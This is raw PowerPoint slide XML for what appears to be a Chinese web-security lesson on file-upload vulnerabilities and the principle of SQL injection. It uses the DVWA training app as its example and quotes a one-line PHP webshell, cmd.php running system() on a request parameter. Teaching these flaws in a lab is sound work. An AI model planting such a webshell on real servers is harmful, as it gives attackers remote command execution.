                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</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ebS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>GI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等网页文件形式存在的一 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>种命令执行环境，也可以将其称之为一种网页后门）等。这种攻击方式是最为直 接和有效的，网站的文件上传功能本身并没有问题，有问题的是文件上传后服务 器怎么处理和解释文件。如果服务器对上传文件的处理逻辑做的不够安全，就会 导致严重的后果。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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039587"/>
            <a:ext cx="3481070" cy="729615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="740"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件上传漏洞利用场景</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面给出一个示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，利</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>系统中上传文件的漏洞获取服务器信</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>息</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>登录系</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>统</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>进</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>模块，按正常需求对普通文件做一次完整的上</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>传</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，  如图所示，上传成功后</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>系统返回了文件的相对路</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>径</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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058049" y="1803654"/>
            <a:ext cx="2892551" cy="1088897"/>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061097" y="1808226"/>
            <a:ext cx="2887345" cy="1079500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2887345" h="1079500">
                <a:moveTo>
                  <a:pt x="0" y="1078992"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887217" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887217" y="1078992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1078992"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2170055" y="2973613"/>
            <a:ext cx="686435"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上传图</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>片文件成功</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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80276"/>
            <a:ext cx="3373120" cy="340995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="17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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;?system($_REQUEST['cmd']);?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>保存为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>cmd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件，上传此文件至服务 器，如图所示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>系统提示上传不成功，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对上传的文件类型做了限 制。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714377" y="2491902"/>
            <a:ext cx="65405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上传</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件失败</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651139" y="1231265"/>
            <a:ext cx="2909316" cy="1193291"/>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654949" y="1237361"/>
            <a:ext cx="2901315" cy="1183640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2901315" h="1183639">
                <a:moveTo>
                  <a:pt x="0" y="1183386"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900933" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2900934" y="1183386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1183386"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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1</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106680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SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入原理</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="832985"/>
            <a:ext cx="3364865" cy="806450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="62230" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>层最高危的漏洞之</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="96800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数据库注入漏洞，主要是开发人员在构建代码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，没有对输入边界进行过滤或者 过滤不足，使得攻击者可以通过合法的输入点提交一些精心构造的语句来欺骗后 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>台数据库执行，导致数据库信息泄露的一种漏</a:t>
            </a:r>
